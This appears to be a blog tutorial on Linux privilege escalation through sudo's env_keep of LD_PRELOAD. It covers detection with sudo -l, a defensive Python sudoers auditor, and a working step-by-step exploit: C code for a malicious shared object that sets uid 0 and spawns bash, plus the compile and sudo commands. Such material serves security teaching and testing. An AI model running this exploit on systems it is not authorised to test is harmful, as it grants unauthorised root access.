Privilege escalation through the LD_PRELOAD environment variable. Before the exploit, let's read a little about the LD_PRELOAD environment variable.
Index
- What is LD_PRELOAD?
- Detection.
- Exploit LD_PRELOAD.
What is LD_PRELOAD?
LD_PRELOAD is an optional environment variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library, including the C runtime library (libc.so). This is called preloading a library.
To avoid this mechanism being used as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.
Detection
Fire up a terminal and type:
```
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD
```
If the output looks something like this, congratulations: the target is vulnerable and you can exploit the LD_PRELOAD issue to get a root shell. To accomplish the privilege escalation you also need permission to run some binary through sudo with LD_PRELOAD in its environment, that is, some sudo command the current user is allowed to run.
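For the defensive side of this check, the following added example (not code from the original post) audits sudoers text or `sudo -l` output for `env_keep` entries that preserve loader variables. The function name and sample inputs are assumptions constructed here, and the check goes beyond the page's LD_PRELOAD case to LD_LIBRARY_PATH, LD_AUDIT and wildcard entries such as `LD_*`.

```python
import fnmatch
import re

# Loader variables to flag. LD_PRELOAD is the page's case; the other two are
# an added generalization (both are honoured by ld.so).
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT")

# env_keep followed by =, += or -= and a quoted list or a single bare name.
ENV_KEEP = re.compile(r'\benv_keep\s*([+-]?=)\s*(?:"([^"]*)"|([^\s,"]+))')


def kept_loader_vars(text):
    """Return the sorted loader variables that env_keep would preserve.

    `text` is sudoers content or `sudo -l` output. Entries are applied in
    order, so a later `-=` or plain `=` can undo an earlier `+=`.
    """
    kept = []  # env_keep patterns in effect, in order of appearance
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#"):  # skip commented-out lines
            continue
        for op, quoted, bare in ENV_KEEP.findall(line):
            names = (quoted or bare).split()
            if op == "=":
                kept = list(names)
            elif op == "+=":
                kept += [n for n in names if n not in kept]
            else:  # "-="
                kept = [n for n in kept if n not in names]
    # env_keep entries may use shell-style wildcards such as LD_*.
    return sorted(v for v in LOADER_VARS
                  if any(fnmatch.fnmatchcase(v, p.split("=")[0]) for p in kept))


# Constructed samples: the `sudo -l` output from this page, then sudoers text.
SUDO_L = """Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD
"""
SUDOERS = '''Defaults env_reset
# Defaults env_keep += "LD_PRELOAD"
Defaults env_keep += "LANG LD_* DISPLAY"
Defaults env_keep -= "LD_*"
Defaults env_keep += LD_LIBRARY_PATH
'''

if __name__ == "__main__":
    for label, sample in (("sudo -l", SUDO_L), ("sudoers", SUDOERS)):
        print(label, "->", kept_loader_vars(sample) or "no loader variables kept")
```

An empty result means none of the listed loader variables survive sudo's environment reset through `env_keep`; any name returned points to a Defaults entry that should be removed.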
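Program file:
```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* _init() runs as soon as the loader maps the library. */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep the spawned shell from preloading the library again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```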
Exploit LD_PRELOAD
Open a terminal and go to any writable directory for dropping the shell.
Writable directories include:
- /tmp
- /var/tmp
- /dev/shm
In our case we are using the /tmp directory.
Drop an evil.c using any text editor; here we used cat for dropping the shell.
```
user@debian:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> #include <unistd.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
> }
> EOF
```
Let's compile it and make the shared object file.
gcc -fPIC -shared -o evil.so evil.c -nostartfiles
Time for the final step 3:)
sudo LD_PRELOAD=evil.so <COMMAND>
Here <COMMAND> means a command you are allowed to run with sudo.
You can use any sudo command that is allowed for the current user.
BooOO00m You got Root SHELL..
Thanks for reading. Comment below with your feedback and suggestions.